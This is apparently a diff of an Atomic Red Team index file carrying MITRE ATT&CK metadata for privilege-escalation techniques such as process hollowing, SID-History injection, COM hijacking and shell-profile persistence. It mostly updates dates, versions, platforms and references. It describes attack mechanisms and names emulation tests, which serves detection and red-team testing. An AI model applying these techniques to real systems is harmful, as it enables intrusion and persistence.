         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -44865,9 +45177,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -45045,7 +45356,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -45119,11 +45429,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -45140,7 +45449,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -45150,7 +45458,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -45159,19 +45467,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -45219,11 +45525,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -45291,18 +45598,17 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests:
     - name: Process Hollowing using PowerShell
@@ -45430,7 +45736,7 @@ privilege-escalation:
           Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -45493,11 +45799,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -45550,8 +45855,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -45599,7 +45904,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests:
     - name: Persistence with Custom AutodialDLL
@@ -45815,73 +46119,7 @@ privilege-escalation:
         elevation_required: true
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -45929,6 +46167,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -45939,9 +46181,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -45950,8 +46196,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -46146,7 +46451,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -46171,8 +46476,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests:
     - name: Injection SID-History with mimikatz
@@ -46225,7 +46528,7 @@ privilege-escalation:
           '
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -46305,7 +46608,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -46341,7 +46643,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -46364,7 +46666,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests:
     - name: Authentication Package
@@ -46387,7 +46688,7 @@ privilege-escalation:
         elevation_required: true
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -46465,7 +46766,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests:
     - name: COM Hijacking - InprocServer32
@@ -46608,7 +46908,7 @@ privilege-escalation:
         name: powershell
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -46669,7 +46969,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -46741,7 +47040,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -46763,7 +47062,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests:
     - name: Add file to Local Library StartupItems
@@ -46996,7 +47294,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -47019,7 +47316,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -47049,12 +47346,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -47139,7 +47434,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests:
     - name: Install AppInit Shim
@@ -47263,7 +47557,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests:
     - name: Set Arbitrary Binary as Screensaver
@@ -47372,7 +47665,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -47400,7 +47693,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests:
     - name: Launch Agent
@@ -47547,7 +47839,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -47590,12 +47882,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -47612,7 +47902,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -47671,7 +47961,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -47753,7 +48042,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests:
     - name: rc.common
@@ -47815,7 +48103,7 @@ privilege-escalation:
           '
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -47912,7 +48200,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -48026,7 +48313,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests:
     - name: Create Systemd Service
@@ -48250,7 +48536,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -48278,7 +48563,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -48322,8 +48607,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -48359,7 +48642,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -48378,7 +48661,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests:
     - name: Copy in loginwindow.plist for Re-Opened Applications
@@ -48472,7 +48754,7 @@ privilege-escalation:
         name: sh
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -48522,7 +48804,6 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
